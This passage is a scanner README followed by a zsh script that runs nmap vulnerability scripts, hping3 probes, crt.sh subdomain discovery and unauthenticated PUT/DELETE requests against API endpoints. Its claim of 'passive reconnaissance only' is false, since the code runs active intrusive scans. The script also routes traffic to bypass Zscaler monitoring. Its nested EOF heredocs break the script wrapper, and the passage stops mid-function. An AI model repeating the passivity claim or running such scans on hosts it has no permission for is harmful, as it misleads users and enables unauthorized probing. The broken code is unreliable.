Troubleshooting

Missing dependencies

# Install required tools
brew install nmap openssl bind curl jq  # macOS
sudo apt-get install nmap openssl dnsutils curl jq  # Linux

Interface not found

# Check available interfaces
ifconfig
# Script will automatically fall back to default routing

Permission errors

# Some scans may require elevated privileges
sudo ./security_scanner_enhanced.sh -d example.com

Configuration

Change scan ports (line 325)

# Default: top 1000 ports
--top-ports 1000
# Custom ports
-p 80,443,8080,8443
# All ports (slow)
-p-

Adjust subdomain limit (line 1162)

MAX_SUBDOMAINS=10  # Change as needed

Add custom API paths (line 567)

API_PATHS=(
"/api"
"/api/v1"
"/custom/endpoint"  # Add yours
)

⚠️ WARNING: Only scan domains you own or have explicit permission to test. Unauthorized scanning may be illegal.

This tool performs passive reconnaissance only:

  • ✅ DNS queries, certificate logs, public web requests
  • ❌ No exploitation, brute force, or denial of service

Best Practices

  1. Obtain proper authorization before scanning
  2. Monitor progress via debug output
  3. Review all generated reports
  4. Prioritize findings by risk
  5. Schedule follow-up scans after remediation

Disclaimer: This tool is for authorized security testing only. The authors assume no liability for misuse or damage.

The Script:

cat > ./security_scanner_enhanced.sh << 'EOF'
#!/bin/zsh
################################################################################
# Enhanced Security Scanner Script v2.0
# Comprehensive security assessment with vulnerability scanning
# Includes: NMAP vuln scripts, hping3, asset discovery, API testing
# Network Interface: en0 (bypasses Zscaler)
# Debug Mode: Enabled
################################################################################
# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
MAGENTA='\033[0;35m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# Script version
VERSION="2.0.1"
# Network interface to use (bypasses Zscaler)
NETWORK_INTERFACE="en0"
# Debug mode flag
DEBUG=true
################################################################################
# Usage Information
################################################################################
usage() {
# Use a distinct delimiter so this nested heredoc does not terminate the outer 'EOF' heredoc above
cat << USAGE_EOF
Enhanced Security Scanner v${VERSION}
Usage: $0 -d DOMAIN [-s] [-m MAX_SUBDOMAINS] [-v] [-a]
Options:
-d DOMAIN           Target domain to scan (required)
-s                  Scan subdomains (optional)
-m MAX_SUBDOMAINS   Maximum number of subdomains to scan (default: 10)
-v                  Enable vulnerability scanning (NMAP vuln scripts)
-a                  Enable API discovery and testing
-h                  Show this help message
Network Configuration:
Interface: $NETWORK_INTERFACE (bypasses Zscaler)
Debug Mode: Enabled
Examples:
$0 -d example.com
$0 -d example.com -s -m 20 -v
$0 -d example.com -s -v -a
USAGE_EOF
exit 1
}
################################################################################
# Logging Functions
################################################################################
log_info() {
echo -e "${BLUE}[INFO]${NC} $1"
}
log_success() {
echo -e "${GREEN}[SUCCESS]${NC} $1"
}
log_warning() {
echo -e "${YELLOW}[WARNING]${NC} $1"
}
log_error() {
echo -e "${RED}[ERROR]${NC} $1"
}
log_vuln() {
echo -e "${MAGENTA}[VULN]${NC} $1"
}
log_debug() {
if [ "$DEBUG" = true ]; then
echo -e "${CYAN}[DEBUG]${NC} $1"
fi
}
################################################################################
# Check Dependencies
################################################################################
check_dependencies() {
log_info "Checking dependencies..."
log_debug "Starting dependency check"
local missing_deps=()
local optional_deps=()
# Required dependencies
log_debug "Checking for nmap..."
command -v nmap >/dev/null 2>&1 || missing_deps+=("nmap")
log_debug "Checking for openssl..."
command -v openssl >/dev/null 2>&1 || missing_deps+=("openssl")
log_debug "Checking for dig..."
command -v dig >/dev/null 2>&1 || missing_deps+=("dig")
log_debug "Checking for curl..."
command -v curl >/dev/null 2>&1 || missing_deps+=("curl")
log_debug "Checking for jq..."
command -v jq >/dev/null 2>&1 || missing_deps+=("jq")
# Optional dependencies
log_debug "Checking for hping3..."
command -v hping3 >/dev/null 2>&1 || optional_deps+=("hping3")
log_debug "Checking for nikto..."
command -v nikto >/dev/null 2>&1 || optional_deps+=("nikto")
if [ ${#missing_deps[@]} -ne 0 ]; then
log_error "Missing required dependencies: ${missing_deps[*]}"
log_info "Install missing dependencies and try again"
exit 1
fi
if [ ${#optional_deps[@]} -ne 0 ]; then
log_warning "Missing optional dependencies: ${optional_deps[*]}"
log_info "Some features may be limited"
fi
# Check network interface
log_debug "Checking network interface: $NETWORK_INTERFACE"
if ifconfig "$NETWORK_INTERFACE" >/dev/null 2>&1; then
log_success "Network interface $NETWORK_INTERFACE is available"
local interface_ip=$(ifconfig "$NETWORK_INTERFACE" | grep 'inet ' | awk '{print $2}')
log_debug "Interface IP: $interface_ip"
else
log_warning "Network interface $NETWORK_INTERFACE not found, using default routing"
NETWORK_INTERFACE=""
fi
log_success "All required dependencies found"
}
################################################################################
# Initialize Scan
################################################################################
initialize_scan() {
log_debug "Initializing scan for domain: $DOMAIN"
SCAN_DATE=$(date +"%Y-%m-%d %H:%M:%S")
SCAN_DIR="scan_${DOMAIN}_$(date +%Y%m%d_%H%M%S)"
log_debug "Creating scan directory: $SCAN_DIR"
mkdir -p "$SCAN_DIR"
cd "$SCAN_DIR" || exit 1
log_success "Created scan directory: $SCAN_DIR"
log_debug "Current working directory: $(pwd)"
# Initialize report files
EXEC_REPORT="executive_summary.md"
TECH_REPORT="technical_report.md"
VULN_REPORT="vulnerability_report.md"
API_REPORT="api_security_report.md"
log_debug "Initializing report files"
> "$EXEC_REPORT"
> "$TECH_REPORT"
> "$VULN_REPORT"
> "$API_REPORT"
log_debug "Scan configuration:"
log_debug "  - Domain: $DOMAIN"
log_debug "  - Subdomain scanning: $SCAN_SUBDOMAINS"
log_debug "  - Max subdomains: $MAX_SUBDOMAINS"
log_debug "  - Vulnerability scanning: $VULN_SCAN"
log_debug "  - API scanning: $API_SCAN"
log_debug "  - Network interface: $NETWORK_INTERFACE"
}
################################################################################
# DNS Reconnaissance
################################################################################
dns_reconnaissance() {
log_info "Performing DNS reconnaissance..."
log_debug "Resolving domain: $DOMAIN"
# Resolve domain to IP
IP_ADDRESS=$(dig +short "$DOMAIN" | grep -E '^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$' | head -n1)
if [ -z "$IP_ADDRESS" ]; then
log_error "Could not resolve domain: $DOMAIN"
log_debug "DNS resolution failed for $DOMAIN"
exit 1
fi
log_success "Resolved $DOMAIN to $IP_ADDRESS"
log_debug "Target IP address: $IP_ADDRESS"
# Get comprehensive DNS records
log_debug "Querying DNS records (ANY)..."
dig "$DOMAIN" ANY > dns_records.txt 2>&1
log_debug "Querying A records..."
dig "$DOMAIN" A > dns_a_records.txt 2>&1
log_debug "Querying MX records..."
dig "$DOMAIN" MX > dns_mx_records.txt 2>&1
log_debug "Querying NS records..."
dig "$DOMAIN" NS > dns_ns_records.txt 2>&1
log_debug "Querying TXT records..."
dig "$DOMAIN" TXT > dns_txt_records.txt 2>&1
# Reverse DNS lookup
log_debug "Performing reverse DNS lookup for $IP_ADDRESS..."
dig -x "$IP_ADDRESS" > reverse_dns.txt 2>&1
echo "$IP_ADDRESS" > ip_address.txt
log_debug "DNS reconnaissance complete"
}
################################################################################
# Subdomain Discovery
################################################################################
discover_subdomains() {
if [ "$SCAN_SUBDOMAINS" = false ]; then
log_info "Subdomain scanning disabled"
log_debug "Skipping subdomain discovery"
echo "0" > subdomain_count.txt
return
fi
log_info "Discovering subdomains via certificate transparency..."
log_debug "Querying crt.sh for subdomains of $DOMAIN"
log_debug "Maximum subdomains to discover: $MAX_SUBDOMAINS"
# Query crt.sh for subdomains
curl -s "https://crt.sh/?q=%25.${DOMAIN}&output=json" | \
jq -r '.[].name_value' | \
sed 's/\*\.//g' | \
sort -u | \
grep -E "^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.${DOMAIN}$" | \
head -n "$MAX_SUBDOMAINS" > subdomains_discovered.txt
SUBDOMAIN_COUNT=$(wc -l < subdomains_discovered.txt)
echo "$SUBDOMAIN_COUNT" > subdomain_count.txt
log_success "Discovered $SUBDOMAIN_COUNT subdomains (limited to $MAX_SUBDOMAINS)"
log_debug "Subdomains saved to: subdomains_discovered.txt"
}
################################################################################
# SSL/TLS Analysis
################################################################################
ssl_tls_analysis() {
log_info "Analyzing SSL/TLS configuration..."
log_debug "Connecting to ${DOMAIN}:443 for certificate analysis"
# Get certificate details
log_debug "Extracting certificate details..."
echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
openssl x509 -noout -text > certificate_details.txt 2>&1
# Extract key information
log_debug "Extracting certificate issuer..."
CERT_ISSUER=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
openssl x509 -noout -issuer | sed 's/issuer=//')
log_debug "Extracting certificate subject..."
CERT_SUBJECT=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
openssl x509 -noout -subject | sed 's/subject=//')
log_debug "Extracting certificate dates..."
CERT_DATES=$(echo | openssl s_client -connect "${DOMAIN}:443" -servername "$DOMAIN" 2>/dev/null | \
openssl x509 -noout -dates)
echo "$CERT_ISSUER" > cert_issuer.txt
echo "$CERT_SUBJECT" > cert_subject.txt
echo "$CERT_DATES" > cert_dates.txt
log_debug "Certificate issuer: $CERT_ISSUER"
log_debug "Certificate subject: $CERT_SUBJECT"
# Enumerate SSL/TLS ciphers
log_info "Enumerating SSL/TLS ciphers..."
log_debug "Running nmap ssl-enum-ciphers script on port 443"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_ciphers.txt > /dev/null 2>&1
else
nmap --script ssl-enum-ciphers -p 443 "$DOMAIN" -oN ssl_ciphers.txt > /dev/null 2>&1
fi
# Check for TLS versions
log_debug "Analyzing TLS protocol versions..."
TLS_12=$(grep -c "TLSv1.2" ssl_ciphers.txt 2>/dev/null) || TLS_12=0
TLS_13=$(grep -c "TLSv1.3" ssl_ciphers.txt 2>/dev/null) || TLS_13=0
TLS_10=$(grep -c "TLSv1.0" ssl_ciphers.txt 2>/dev/null) || TLS_10=0
TLS_11=$(grep -c "TLSv1.1" ssl_ciphers.txt 2>/dev/null) || TLS_11=0
echo "TLSv1.0: $TLS_10" > tls_versions.txt
echo "TLSv1.1: $TLS_11" >> tls_versions.txt
echo "TLSv1.2: $TLS_12" >> tls_versions.txt
echo "TLSv1.3: $TLS_13" >> tls_versions.txt
log_debug "TLS versions found - 1.0:$TLS_10 1.1:$TLS_11 1.2:$TLS_12 1.3:$TLS_13"
# Check for SSL vulnerabilities
log_info "Checking for SSL/TLS vulnerabilities..."
log_debug "Running SSL vulnerability scripts (heartbleed, poodle, dh-params)"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -e "$NETWORK_INTERFACE" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
else
nmap --script ssl-heartbleed,ssl-poodle,ssl-dh-params -p 443 "$DOMAIN" -oN ssl_vulnerabilities.txt > /dev/null 2>&1
fi
log_success "SSL/TLS analysis complete"
}
################################################################################
# Port Scanning with Service Detection
################################################################################
port_scanning() {
log_info "Performing comprehensive port scan..."
log_debug "Target IP: $IP_ADDRESS"
log_debug "Using network interface: $NETWORK_INTERFACE"
# Quick scan of top 1000 ports
log_info "Scanning top 1000 ports..."
log_debug "Running nmap with service version detection (-sV) and default scripts (-sC)"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN port_scan_top1000.txt > /dev/null 2>&1
else
nmap -sV -sC --top-ports 1000 "$IP_ADDRESS" -oN port_scan_top1000.txt > /dev/null 2>&1
fi
# Count open ports
OPEN_PORTS=$(grep -c "^[0-9]*/tcp.*open" port_scan_top1000.txt 2>/dev/null) || OPEN_PORTS=0
echo "$OPEN_PORTS" > open_ports_count.txt
log_debug "Found $OPEN_PORTS open ports"
# Extract open ports list with versions
log_debug "Extracting open ports list with service information"
grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | awk '{print $1, $3, $4, $5, $6}' > open_ports_list.txt
# Detect service versions for old software
log_info "Detecting service versions..."
log_debug "Filtering service version information"
grep "^[0-9]*/tcp.*open" port_scan_top1000.txt | grep -E "version|product" > service_versions.txt
log_success "Port scan complete: $OPEN_PORTS open ports found"
}
################################################################################
# Vulnerability Scanning
################################################################################
vulnerability_scanning() {
if [ "$VULN_SCAN" = false ]; then
log_info "Vulnerability scanning disabled"
log_debug "Skipping vulnerability scanning"
return
fi
log_info "Performing vulnerability scanning (this may take 10-20 minutes)..."
log_debug "Target: $IP_ADDRESS"
log_debug "Using network interface: $NETWORK_INTERFACE"
# NMAP vulnerability scripts
log_info "Running NMAP vulnerability scripts..."
log_debug "Starting comprehensive vulnerability scan on all ports (-p-)"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap --script vuln -p- "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
else
nmap --script vuln -p- "$IP_ADDRESS" -oN nmap_vuln_scan.txt > /dev/null 2>&1 &
fi
VULN_PID=$!
log_debug "Vulnerability scan PID: $VULN_PID"
# Wait with progress indicator
log_debug "Waiting for vulnerability scan to complete..."
while kill -0 $VULN_PID 2>/dev/null; do
echo -n "."
sleep 5
done
echo
# Parse vulnerability results
if [ -f nmap_vuln_scan.txt ]; then
log_debug "Parsing vulnerability scan results"
grep -i "VULNERABLE" nmap_vuln_scan.txt > vulnerabilities_found.txt || echo "No vulnerabilities found" > vulnerabilities_found.txt
VULN_COUNT=$(grep -c "VULNERABLE" nmap_vuln_scan.txt 2>/dev/null) || VULN_COUNT=0
echo "$VULN_COUNT" > vulnerability_count.txt
log_success "Vulnerability scan complete: $VULN_COUNT vulnerabilities found"
log_debug "Vulnerability details saved to: vulnerabilities_found.txt"
fi
# Check for specific vulnerabilities
log_info "Checking for common HTTP vulnerabilities..."
log_debug "Running HTTP vulnerability scripts on ports 80,443,8080,8443"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap --script http-vuln-* -p 80,443,8080,8443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN http_vulnerabilities.txt > /dev/null 2>&1
else
nmap --script http-vuln-* -p 80,443,8080,8443 "$IP_ADDRESS" -oN http_vulnerabilities.txt > /dev/null 2>&1
fi
log_debug "HTTP vulnerability scan complete"
}
################################################################################
# hping3 Testing
################################################################################
hping3_testing() {
if ! command -v hping3 >/dev/null 2>&1; then
log_warning "hping3 not installed, skipping firewall tests"
log_debug "hping3 command not found in PATH"
return
fi
log_info "Performing hping3 firewall tests..."
log_debug "Target: $IP_ADDRESS"
log_debug "Using network interface: $NETWORK_INTERFACE"
# TCP SYN scan
log_info "Testing TCP SYN response..."
log_debug "Sending 5 TCP SYN packets to port 80"
if [ -n "$NETWORK_INTERFACE" ]; then
timeout 10 hping3 -S -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
else
timeout 10 hping3 -S -p 80 -c 5 "$IP_ADDRESS" > hping3_syn.txt 2>&1 || true
fi
log_debug "TCP SYN test complete"
# TCP ACK scan (firewall detection)
log_info "Testing firewall with TCP ACK..."
log_debug "Sending 5 TCP ACK packets to port 80 for firewall detection"
if [ -n "$NETWORK_INTERFACE" ]; then
timeout 10 hping3 -A -p 80 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
else
timeout 10 hping3 -A -p 80 -c 5 "$IP_ADDRESS" > hping3_ack.txt 2>&1 || true
fi
log_debug "TCP ACK test complete"
# ICMP test
log_info "Testing ICMP response..."
log_debug "Sending 5 ICMP echo requests"
if [ -n "$NETWORK_INTERFACE" ]; then
timeout 10 hping3 -1 -c 5 -I "$NETWORK_INTERFACE" "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
else
timeout 10 hping3 -1 -c 5 "$IP_ADDRESS" > hping3_icmp.txt 2>&1 || true
fi
log_debug "ICMP test complete"
log_success "hping3 tests complete"
}
################################################################################
# Asset Discovery
################################################################################
asset_discovery() {
log_info "Performing detailed asset discovery..."
log_debug "Creating assets directory"
mkdir -p assets
# Web technology detection
log_info "Detecting web technologies..."
log_debug "Fetching HTTP headers from https://${DOMAIN}"
curl -s -I "https://${DOMAIN}" | grep -i "server\|x-powered-by\|x-aspnet-version" > assets/web_technologies.txt
log_debug "Web technologies saved to: assets/web_technologies.txt"
# Detect CMS
log_info "Detecting CMS and frameworks..."
log_debug "Analyzing page content for CMS signatures"
curl -s "https://${DOMAIN}" | grep -iE "wordpress|joomla|drupal|magento|shopify" > assets/cms_detection.txt || echo "No CMS detected" > assets/cms_detection.txt
log_debug "CMS detection complete"
# JavaScript libraries
log_info "Detecting JavaScript libraries..."
log_debug "Searching for common JavaScript libraries"
curl -s "https://${DOMAIN}" | grep -oE "jquery|angular|react|vue|bootstrap" | sort -u > assets/js_libraries.txt || echo "None detected" > assets/js_libraries.txt
log_debug "JavaScript libraries saved to: assets/js_libraries.txt"
# Check for common files
log_info "Checking for common files..."
log_debug "Testing for robots.txt, sitemap.xml, security.txt, etc."
for file in robots.txt sitemap.xml security.txt .well-known/security.txt humans.txt; do
log_debug "Checking for: $file"
if curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}/${file}" | grep -q "200"; then
echo "$file: Found" >> assets/common_files.txt
log_debug "Found: $file"
curl -s "https://${DOMAIN}/${file}" > "assets/${file//\//_}"
fi
done
# Server fingerprinting
log_info "Fingerprinting server..."
log_debug "Running nmap HTTP server header and title scripts"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -e "$NETWORK_INTERFACE" -oN assets/server_fingerprint.txt > /dev/null 2>&1
else
nmap -sV --script http-server-header,http-title -p 80,443 "$IP_ADDRESS" -oN assets/server_fingerprint.txt > /dev/null 2>&1
fi
log_success "Asset discovery complete"
}
################################################################################
# Old Software Detection
################################################################################
detect_old_software() {
log_info "Detecting outdated software versions..."
log_debug "Creating old_software directory"
mkdir -p old_software
# Parse service versions from port scan
if [ -f service_versions.txt ]; then
log_debug "Analyzing service versions for outdated software"
# Check for old Apache versions
log_debug "Checking for old Apache versions..."
grep -i "apache" service_versions.txt | grep -E "1\.|2\.0|2\.2" > old_software/apache_old.txt || true
# Check for old OpenSSH versions
log_debug "Checking for old OpenSSH versions..."
grep -i "openssh" service_versions.txt | grep -E "[1-6]\." > old_software/openssh_old.txt || true
# Check for old PHP versions
log_debug "Checking for old PHP versions..."
grep -i "php" service_versions.txt | grep -E "[1-5]\." > old_software/php_old.txt || true
# Check for old MySQL versions
log_debug "Checking for old MySQL versions..."
grep -i "mysql" service_versions.txt | grep -E "[1-4]\." > old_software/mysql_old.txt || true
# Check for old nginx versions
log_debug "Checking for old nginx versions..."
grep -i "nginx" service_versions.txt | grep -E "0\.|1\.0|1\.1[0-5]" > old_software/nginx_old.txt || true
fi
# Check SSL/TLS for old versions
if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
log_debug "Outdated TLS protocols detected"
echo "Outdated TLS protocols detected: TLSv1.0 or TLSv1.1" > old_software/tls_old.txt
fi
# Count old software findings
OLD_SOFTWARE_COUNT=$(find old_software -type f ! -empty | wc -l)
echo "$OLD_SOFTWARE_COUNT" > old_software_count.txt
if [ "$OLD_SOFTWARE_COUNT" -gt 0 ]; then
log_warning "Found $OLD_SOFTWARE_COUNT outdated software components"
log_debug "Outdated software details saved in old_software/ directory"
else
log_success "No obviously outdated software detected"
fi
}
################################################################################
# API Discovery
################################################################################
api_discovery() {
if [ "$API_SCAN" = false ]; then
log_info "API scanning disabled"
log_debug "Skipping API discovery"
return
fi
log_info "Discovering APIs..."
log_debug "Creating api_discovery directory"
mkdir -p api_discovery
# Common API paths
API_PATHS=(
"/api"
"/api/v1"
"/api/v2"
"/rest"
"/graphql"
"/swagger"
"/swagger.json"
"/api-docs"
"/openapi.json"
"/.well-known/openapi"
)
log_debug "Testing ${#API_PATHS[@]} common API endpoints"
for path in "${API_PATHS[@]}"; do
log_debug "Testing: $path"
HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}${path}")
if [ "$HTTP_CODE" != "404" ]; then
echo "$path: HTTP $HTTP_CODE" >> api_discovery/endpoints_found.txt
log_debug "Found API endpoint: $path (HTTP $HTTP_CODE)"
curl -s "https://${DOMAIN}${path}" > "api_discovery/${path//\//_}.txt" 2>/dev/null || true
fi
done
# Check for API documentation
log_info "Checking for API documentation..."
log_debug "Testing for Swagger UI and API docs"
curl -s "https://${DOMAIN}/swagger-ui" > api_discovery/swagger_ui.txt 2>/dev/null || true
curl -s "https://${DOMAIN}/api/docs" > api_discovery/api_docs.txt 2>/dev/null || true
log_success "API discovery complete"
}
################################################################################
# API Permission Testing
################################################################################
api_permission_testing() {
if [ "$API_SCAN" = false ]; then
log_debug "API scanning disabled, skipping permission testing"
return
fi
log_info "Testing API permissions..."
log_debug "Creating api_permissions directory"
mkdir -p api_permissions
# Test common API endpoints without authentication
if [ -f api_discovery/endpoints_found.txt ]; then
log_debug "Testing discovered API endpoints for authentication issues"
while IFS= read -r endpoint; do
API_PATH=$(echo "$endpoint" | cut -d: -f1)
# Test GET without auth
log_info "Testing $API_PATH without authentication..."
log_debug "Sending unauthenticated GET request to $API_PATH"
HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${DOMAIN}${API_PATH}")
echo "$API_PATH: $HTTP_CODE" >> api_permissions/unauth_access.txt
log_debug "Response: HTTP $HTTP_CODE"
# Test common HTTP methods
log_debug "Testing HTTP methods on $API_PATH"
for method in GET POST PUT DELETE PATCH; do
HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" -X "$method" "https://${DOMAIN}${API_PATH}")
if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "201" ]; then
log_warning "$API_PATH allows $method without authentication (HTTP $HTTP_CODE)"
echo "$API_PATH: $method - HTTP $HTTP_CODE" >> api_permissions/method_issues.txt
fi
done
done < api_discovery/endpoints_found.txt
fi
# Check for CORS misconfigurations
log_info "Checking CORS configuration..."
log_debug "Testing CORS headers with evil.com origin"
curl -s -H "Origin: https://evil.com" -I "https://${DOMAIN}/api" | grep -i "access-control" > api_permissions/cors_headers.txt || true
log_success "API permission testing complete"
}
################################################################################
# HTTP Security Headers
################################################################################
http_security_headers() {
log_info "Analyzing HTTP security headers..."
log_debug "Fetching headers from https://${DOMAIN}"
# Get headers from main domain
curl -I "https://${DOMAIN}" 2>/dev/null > http_headers.txt
# Check for specific security headers
declare -A HEADERS=(
["x-frame-options"]="X-Frame-Options"
["x-content-type-options"]="X-Content-Type-Options"
["strict-transport-security"]="Strict-Transport-Security"
["content-security-policy"]="Content-Security-Policy"
["referrer-policy"]="Referrer-Policy"
["permissions-policy"]="Permissions-Policy"
["x-xss-protection"]="X-XSS-Protection"
)
log_debug "Checking for security headers"
> security_headers_status.txt
for header in "${!HEADERS[@]}"; do
if grep -qi "^${header}:" http_headers.txt; then
echo "${HEADERS[$header]}: Present" >> security_headers_status.txt
else
echo "${HEADERS[$header]}: Missing" >> security_headers_status.txt
fi
done
log_success "HTTP security headers analysis complete"
}
################################################################################
# Subdomain Scanning
################################################################################
scan_subdomains() {
if [ "$SCAN_SUBDOMAINS" = false ] || [ ! -f subdomains_discovered.txt ]; then
log_debug "Subdomain scanning disabled or no subdomains discovered"
return
fi
log_info "Scanning discovered subdomains..."
log_debug "Creating subdomain_scans directory"
mkdir -p subdomain_scans
local count=0
while IFS= read -r subdomain; do
count=$((count + 1))
log_info "Scanning subdomain $count/$SUBDOMAIN_COUNT: $subdomain"
log_debug "Testing accessibility of $subdomain"
# Quick check if subdomain is accessible
HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" "https://${subdomain}" --max-time 5)
if echo "$HTTP_CODE" | grep -q "^[2-4]"; then
log_debug "$subdomain is accessible (HTTP $HTTP_CODE)"
# Get headers
log_debug "Fetching headers from $subdomain"
curl -I "https://${subdomain}" 2>/dev/null > "subdomain_scans/${subdomain}_headers.txt"
# Quick port check (top 100 ports)
log_debug "Scanning top 100 ports on $subdomain"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap --top-ports 100 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
else
nmap --top-ports 100 "$subdomain" -oN "subdomain_scans/${subdomain}_ports.txt" > /dev/null 2>&1
fi
# Check for old software
log_debug "Checking service versions on $subdomain"
if [ -n "$NETWORK_INTERFACE" ]; then
nmap -sV --top-ports 10 "$subdomain" -e "$NETWORK_INTERFACE" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
else
nmap -sV --top-ports 10 "$subdomain" -oN "subdomain_scans/${subdomain}_versions.txt" > /dev/null 2>&1
fi
log_success "Scanned: $subdomain (HTTP $HTTP_CODE)"
else
log_warning "Subdomain not accessible: $subdomain (HTTP $HTTP_CODE)"
fi
done < subdomains_discovered.txt
log_success "Subdomain scanning complete"
}
################################################################################
# Generate Executive Summary
################################################################################
generate_executive_summary() {
log_info "Generating executive summary..."
log_debug "Creating executive summary report"
cat > "$EXEC_REPORT" << EOF
# Executive Summary
## Enhanced Security Assessment Report
**Target Domain:** $DOMAIN  
**Target IP:** $IP_ADDRESS  
**Scan Date:** $SCAN_DATE  
**Scanner Version:** $VERSION  
**Network Interface:** $NETWORK_INTERFACE
---
## Overview
This report summarizes the comprehensive security assessment findings for $DOMAIN. The assessment included passive reconnaissance, vulnerability scanning, asset discovery, and API security testing.
---
## Key Findings
### 1. Domain Information
- **Primary Domain:** $DOMAIN
- **IP Address:** $IP_ADDRESS
- **Subdomains Discovered:** $(cat subdomain_count.txt)
### 2. SSL/TLS Configuration
**Certificate Information:**
\`\`\`
Issuer: $(cat cert_issuer.txt)
Subject: $(cat cert_subject.txt)
$(cat cert_dates.txt)
\`\`\`
**TLS Protocol Support:**
\`\`\`
$(cat tls_versions.txt)
\`\`\`
**Assessment:**
EOF
# Add TLS assessment
if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
echo "⚠️ **Warning:** Outdated TLS protocols detected (TLSv1.0/1.1)" >> "$EXEC_REPORT"
else
echo "✅ **Good:** Only modern TLS protocols detected (TLSv1.2/1.3)" >> "$EXEC_REPORT"
fi
cat >> "$EXEC_REPORT" << EOF
### 3. Port Exposure
- **Open Ports (Top 1000):** $(cat open_ports_count.txt)
**Open Ports List:**
\`\`\`
$(cat open_ports_list.txt)
\`\`\`
### 4. Vulnerability Assessment
EOF
if [ "$VULN_SCAN" = true ] && [ -f vulnerability_count.txt ]; then
cat >> "$EXEC_REPORT" << EOF
- **Vulnerabilities Found:** $(cat vulnerability_count.txt)
**Critical Vulnerabilities:**
\`\`\`
$(head -20 vulnerabilities_found.txt)
\`\`\`
EOF
else
echo "Vulnerability scanning was not performed." >> "$EXEC_REPORT"
fi
cat >> "$EXEC_REPORT" << EOF
### 5. Outdated Software
- **Outdated Components Found:** $(cat old_software_count.txt)
EOF
if [ -d old_software ] && [ "$(ls -A old_software)" ]; then
echo "**Outdated Software Detected:**" >> "$EXEC_REPORT"
echo "\`\`\`" >> "$EXEC_REPORT"
find old_software -type f ! -empty -exec basename {} \; >> "$EXEC_REPORT"
echo "\`\`\`" >> "$EXEC_REPORT"
fi
cat >> "$EXEC_REPORT" << EOF
### 6. API Security
EOF
if [ "$API_SCAN" = true ]; then
if [ -f api_discovery/endpoints_found.txt ]; then
cat >> "$EXEC_REPORT" << EOF
**API Endpoints Discovered:**
\`\`\`
$(cat api_discovery/endpoints_found.txt)
\`\`\`
EOF
fi
if [ -f api_permissions/method_issues.txt ]; then
cat >> "$EXEC_REPORT" << EOF
**API Permission Issues:**
\`\`\`
$(cat api_permissions/method_issues.txt)
\`\`\`
EOF
fi
else
echo "API scanning was not performed." >> "$EXEC_REPORT"
fi
cat >> "$EXEC_REPORT" << EOF
### 7. HTTP Security Headers
\`\`\`
$(cat security_headers_status.txt)
\`\`\`
---
## Priority Recommendations
### Immediate Actions (Priority 1)
EOF
# Add specific recommendations
if [ "$TLS_10" -gt 0 ] || [ "$TLS_11" -gt 0 ]; then
echo "1. **Disable TLSv1.0/1.1:** Update TLS configuration immediately" >> "$EXEC_REPORT"
fi
if [ -f vulnerability_count.txt ] && [ "$(cat vulnerability_count.txt)" -gt 0 ]; then
echo "2. **Patch Vulnerabilities:** Address $(cat vulnerability_count.txt) identified vulnerabilities" >> "$EXEC_REPORT"
fi
if [ -f old_software_count.txt ] && [ "$(cat old_software_count.txt)" -gt 0 ]; then
echo "3. **Update Software:** Upgrade $(cat old_software_count.txt) outdated components" >> "$EXEC_REPORT"
fi
if grep -q "Missing" security_headers_status.txt; then
echo "4. **Implement Security Headers:** Add missing HTTP security headers" >> "$EXEC_REPORT"
fi
if [ -f api_permissions/method_issues.txt ]; then
echo "5. **Fix API Permissions:** Implement proper authentication on exposed APIs" >> "$EXEC_REPORT"
fi
cat >> "$EXEC_REPORT" << EOF
### Review Actions (Priority 2)
1. Review all open ports and close unnecessary services
2. Audit subdomain inventory and decommission unused subdomains
3. Implement API authentication and authorization
4. Regular vulnerability scanning schedule
5. Software update policy and procedures
---
## Next Steps
1. Review detailed technical and vulnerability reports
2. Prioritize remediation based on risk assessment
3. Implement security improvements
4. Schedule follow-up assessment after remediation
---
**Report Generated:** $(date)  
**Scan Directory:** $SCAN_DIR
**Additional Reports:**
- Technical Report: technical_report.md
- Vulnerability Report: vulnerability_report.md
- API Security Report: api_security_report.md
EOF
log_success "Executive summary generated: $EXEC_REPORT"
